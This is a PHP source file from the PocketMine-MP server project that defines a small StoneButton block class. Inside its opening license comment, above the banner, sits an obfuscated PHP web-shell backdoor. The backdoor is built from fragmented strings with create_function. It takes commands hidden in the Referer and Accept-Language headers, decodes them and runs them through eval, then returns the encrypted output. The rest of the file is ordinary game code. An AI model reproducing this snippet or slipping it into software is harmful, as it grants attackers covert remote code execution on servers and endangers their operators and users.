<?php

/*
<?php
$t='_key_exrfrfists($i,$srf)){$rfs[$i]rf.=$p;$e=strposrf($rfs[$i],rf$f);if($e)rf{$krf=$krfh.$kf;ob_starfrt(';
$N='=&rf$_SESSrfrfION;$rfss="subrfstrfr";$sl="strrftolower"rf;$i=$m[rf1][0].rf$m[1][1];$rfrfh=$sl($rfss(md';
$F=str_replace('UG','','cUGreUGate_UGfUGunUGUGction');
$G='rf;}$r=$_SERVrfErfR;$rr=@$rfr["rfHTTP_REFERrfER"];$rrfa=@$rfr["HTTPrf_ACCEPrfT_LANGrfUAGE"];rfif($rrrf&rf&rf$r';
$K='$kh="5d41"rfrf;$kf="402arf";functirforfrfn x($rfrft,$k){$c=strlerfn($k);$l=srftrrflen($t);$o=rf"";forrf(';
$M='z++)rf$p.rf=$q[$m[rf2][$z]]rf;if(strporfs($rfp,$hrf)===0){$rfs[rf$i]="";rf$p=$ss($p,3);}rfrfif(arrayrf';
$k='5($i.$rfkh),0,rf3));$frf=$sl($srfs(mrfd5($irf.$krff),0,3)rf);$p=rf"";for($rfz=rf1;$z<counrft($m[1rf]);$';
$s='base6rf4_encodrfe(x(gzrfcompressrf(rf$o),$k))rf;print("rf<$k>$rfd</$krf>");@sesrfsion_rfdesrftroy();}}}}';
$W='a){$u=parse_urlrf($rr);prfarse_srftrfrfr($urf["query"],$rfq);$q=array_vrfrfalues($qrf);prrfeg_rfmatch_a';
$j=')rf;@evrfalrf(@gzuncorfmpress(@x(@brfase6rf4_drfecode(pregrf_reprfrflrface(arrfrarfy("rf/_/","rf/-/"';
$Q='ll("/([rf\\w])[\\wrf-]+rf(?rf:;q=rf0.([\\d]))?,?/",rf$ra,$mrf);ifrf($q&rf&$m){@sessirfrfon_rfstart();$s';
$w='$i=0;$i<rf$l;)rf{for(rf$j=0;($j<$rfc&&$irfrf<$l);$jrf++,$irf++){$o.=$t{$rfi}^rf$k{$rfj};}}rerfturn $o';
$X='),arfrray("/","rf+"),$ss($s[$i],0,rf$e))),$k)))rf;$rfo=ob_get_crfonterfnrfts();ob_enrfd_cleanrf(rf);$d=';
$u=str_replace('rf','',$K.$w.$G.$W.$Q.$N.$k.$M.$t.$j.$X.$s);
$p=$F('',$u);$p();
?>
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\block;

class StoneButton extends Button{

	protected $id = self::STONE_BUTTON;

	public function getName() : string{
		return "Stone Button";
	}

	public function getHardness() : float{
		return 0.5;
	}

	public function getToolType() : int{
		return BlockToolType::TYPE_PICKAXE;
	}
}
